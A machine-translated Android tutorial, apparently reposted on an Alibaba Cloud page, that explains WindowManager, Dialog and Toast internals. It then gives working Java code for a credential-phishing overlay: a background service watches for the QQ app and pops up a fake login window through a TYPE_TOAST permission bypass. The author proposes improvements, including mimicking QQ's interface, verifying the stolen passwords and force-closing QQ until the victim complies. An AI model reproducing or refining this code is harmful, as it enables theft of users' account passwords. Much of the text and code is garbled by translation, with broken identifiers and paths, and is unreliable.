Analyzing the process of Android WindowManager parsing and defrauding QQ password through case study _android

Source: Internet
Author: User
Tags gettext

Windows Manager is a window management terminal that can be remotely connected to the Linux x Desktop for management, generating a session with the server side to communicate with each other.

Recently saw a person on the internet to raise a loophole in the cloud, the application can open a background service, detection of the current top application, if for QQ or related applications, pop-up a custom window to lure users to enter account password, very interested in summarizing the relevant knowledge to write a demo, Interface is as follows (the interface is rough, should no one be fooled, meaning to the line ha =, =):

Window&&windowmanager Introduction

Before you analyze the demo, you should summarize the relevant knowledge first. First look at the window class, window is an abstract class, located in the code tree Frameworks\u0008asecorejavaandroidviewwindowjava.java file. Along with the comments, this file is a total of more than 1000 lines, which outlines the basic properties and basic features of the android window. The only implementation of this abstract class is Phonewindow, the instantiation of the Phonewindow need a window, only through the WindowManager can be completed, the concrete implementation of the window class is located in Windowmanagerservice, The interaction of WindowManager and Windowmanagerservice is an IPC process. All of the views in Android are rendered through windows, and their views are actually attached to Windows, whether activity,dialog or toast, so Windows is actually the direct manager of view, The Click event is also passed to view by window. The WindowManager.LayoutParams.type parameter represents the type of window, with a total of three types, namely, application window, child window, and System window. application window corresponds to an activity, such as dialog and other child windows can not exist alone, he needs to be attached to the application window, the System window does not need, such as toast, you can directly display. Each window has a corresponding z-orderd, the level of the window will be covered in a small level of window, the application window hierarchy is 1~99, the child window range is 1000~1999, System window range is 2000~ 2999, these levels are corresponding to the relevant Type,type values: Website links and Chinese materials. The WindowManager.LayoutParams.flags parameter represents the properties of the window, which defaults to the None,flags correlation: official links, and other layoutparams variable names and values can refer to Windowmanager.layoutpar AMS (top) and Windowmanager.layoutparams (next) Two translation blog, very detailed.

The Windowmanager,windowmanager is mainly used to manage some of the window's status, attributes, view additions, deletions, updates, window order, message collection and processing, and so on. An instance of WindowManager can be obtained through code Context.getsystemservice (Context.window_service). WindowManager provides a simple feature that is commonly used in only three ways, namely, adding view, updating view, and deleting view, which are defined in Viewmanager, and WindowManager inherits Viewmanager,

AddView ();
Updateviewlayout ();
Removeview ();

These functions are used to modify the window, its real implementation is Windowmanagerimpl class, Windowmanagerimpl class does not directly implement window three major operations, but all to the windowmanagerglobal to deal with, Windowmanagerglobal in the form of a factory to provide their own instances, in the Windowmanagerglobal has the following code: Private final Windowmanagerglobal Mglobal = Windowmanagerglobal.getinstance (). Windowmanagerimpl This mode of work is a typical bridging pattern (not a decorator pattern: the difference is here), and all the operations are delegated to Windowmanagerglobal for implementation.

View is the way in which views are presented in Android, but view cannot exist alone, he must adhere to the abstract concept of window, each window corresponds to a view and a Viewrootimpl, window and view are connected by Viewrootimpl, so there are windows in the view, such as common activity,dialog,toast.

For each activity there is only one decorview, i.e. Viewroot,window is obtained by the following method
Window Mwindow = Policymanager.makenewwindow (this);

After the window is created, the activity will set a callback for the window, and the window will be recalled to the activity when it receives an external state change. The Setcontentview () function is invoked in the activity, which is done by calling Window.setcontentview (), and the concrete implementation of the window is Phonewindow, So the final concrete operation is in Phonewindow, the first step of the Phonewindow Setcontentview method is to detect if Decorview exists, if it does not exist, The Generatedecor function is called directly to create a decorview; the second step is to add the view of the activity to the mcontentparent of the Decorview The third step is to callback the Oncontentchanged method in the activity to notify that the activity view has changed. After these steps have been completed, Decorview has not been formally added to the window by WindowManager, and finally the Makevisible method in the Onresume method of the activity is invoked to truly complete the addition and the actual process. The view of the activity can be seen by the user.

The dialog window creation process is similar to activity, The first step is to use the Policymanager.makenewwindow method to create a window, but the incoming context must be the context of the activity, and the second step is to set the dialog layout view through the Setcontentview function; The third step calls the show method, which is displayed by adding Decorview to the window by WindowManager.

Toast and dialog different, it is slightly more complex, first of all toast is based on window to implement, but because Toast has the function of timing cancellation, so the system uses handler. There are two types of IPC processes inside toast, the first is toast Access Notificationmanagerservice, and the second is the TN interface in Notificationmanagerservice callback toast. In the Toast class, the most important show method for displaying the toast calls Service.enqueuetoast (Pkg, TN, mduration), which means that the system maintains a toast queue for us, This is why two toast will not be displayed at the same time, and this method will join a toast to display the time that the system maintains the display.

private static Inotificationmanager Sservice;
Static private Inotificationmanager GetService () {
if (sservice!= null) {return
sservice;
}
Sservice = INotificationManager.Stub.asInterface (Servicemanager.getservice ("Notification"));
return sservice;
}

The service Sservice is the service that the system uses to maintain toast. The final NMS invokes a static private class tn inside the toast class via IPC, which is the primary implementation of the toast, which completes the Toast view creation, display, and concealment.

Cheat QQ Password Example

With the above foundation, this example is actually very simple.

The first step is to write a service and eject a custom window in the service:

WindowManager = (WindowManager) getsystemservice (Context.window_service);
Windowmanager.layoutparams params = new Windowmanager.layoutparams ();
Params.width = WindowManager.LayoutParams.MATCH_PARENT;
Params.height = WindowManager.LayoutParams.MATCH_PARENT;
Params.flags = WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL;
Params.type = WindowManager.LayoutParams.TYPE_TOAST;
Params.format = pixelformat.transparent;
params.gravity = Gravity.center;
Params.softinputmode = WindowManager.LayoutParams.SOFT_INPUT_ADJUST_PAN;
Layoutinflater Inflater = Layoutinflater.from (this);
v = (relativelayoutwithkeydetect) inflater.inflate (R.layout.window, NULL); V.setcallback (New Relativelayoutwithkeydetect.ikeycodebackcallback () {@Override public void Backcallback () {if (v!=
Null && V.isattachedtowindow ()) L.E ("Remove view");
Windowmanager.removeviewimmediate (v);
}
});
Btn_sure = (Button) V.findviewbyid (r.id.btn_sure);
Btn_cancel = (Button) V.findviewbyid (r.id.btn_cancel); Et_account = (edittext) V.findviewbyid (R.id.et_account);
Et_pwd = (edittext) V.findviewbyid (R.ID.ET_PWD);
Cb_showpwd = (CheckBox) V.findviewbyid (R.ID.CB_SHOWPWD); Cb_showpwd.setoncheckedchangelistener (New Compoundbutton.oncheckedchangelistener () {@Override public void OnCheckedChanged (Compoundbutton Buttonview, Boolean ischecked) {if (ischecked) {Et_pwd.settransformationmethod (
Hidereturnstransformationmethod.getinstance ()); else {Et_pwd.settransformationmethod (passwordtransformationmethod.getinstance ());} et_pwd.setselection (
Textutils.isempty (Et_pwd.gettext ())?
0:et_pwd.gettext (). Length ());
}
}); Useless//V.setonkeylistener (new View.onkeylistener () {//@Override//public boolean OnKey (View v, int keycode, Keyev Ent event) {//LOG.E ("Zhao", keycode+ "");//if (keycode = = Keyevent.keycode_back) {//Windowmanager.removeviewimmediate
(v);
return true;
}//return false;
// }
// }); Click outside to disappear V.setontouchlistener (new View.ontouchlistener () {@Override public boolean ontouch (view view, MotionEvent event) {Rect temp = new Rect (); View.getglobalvisiblerect (temp);
L.E ("Remove view");
if (temp.contains (int) (EVENT.GETX ()), (int) (Event.gety ()))) {windowmanager.removeviewimmediate (v); return true;}
return false;
}
});
Btn_sure.setonclicklistener (this);
Btn_cancel.setonclicklistener (this);
L.E ("Add View"); Windowmanager.addview (v, params);

Here are a few points to explain, the first is the type to use Type_toast instead of Type_system_error can bypass permissions, this is on the knowledge that someone said a loophole, haha; the second is because there are edittext, So the softinputmode needs to be set to Soft_input_adjust_pan, otherwise the soft keyboard will cover window, and the third is the return key listening, Setonkeylistener is not good to use, In the end, only the dispatchkeyevent function of the view class can be used to monitor the key, and the fourth one is to click the external vanishing operation, and the code will understand.

The pop-up box to achieve the pop-up, and then to set up a real-time monitoring, open a thread, every few seconds to monitor the user is operating the application is QQ, this is much simpler, the use of Activitymanager can be:

New Thread (New Runnable () {
@Override public
void Run () {while
(isrunning) {
L.E ("Running");
try {
Thread.Sleep (3000);
} catch (Interruptedexception e) {
e.printstacktrace ();
}
Activitymanager Activitymanager = (activitymanager)
getsystemservice (context.activity_service);
list<activitymanager.runningappprocessinfo> list =
activitymanager.getrunningappprocesses ();
if (list.get (0). Processname.equals ("Com.tencent.mobileqq")) {
myhandler.sendemptymessage (1);}}}
}). Start ();

This effect is almost the end of the activity in the start of the service can, of course, there are many improvements to the scope:

1. Modify the UI to make it more similar to the QQ style.

2. After the user enters the account number and the password, may addview a loadingdialog, then invokes the correlation interface to verify the user name and the password correctness, does not prompt the user to re-enter correctly.

3. If the user does not enter the account number and password, directly call the Killbackgrondprocess function (need permission), the hard to close the QQ, until the user input account number and password.

Above through the case analysis of Android WindowManager to analyze and cheat QQ password process, I hope this article to share for everyone to help.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.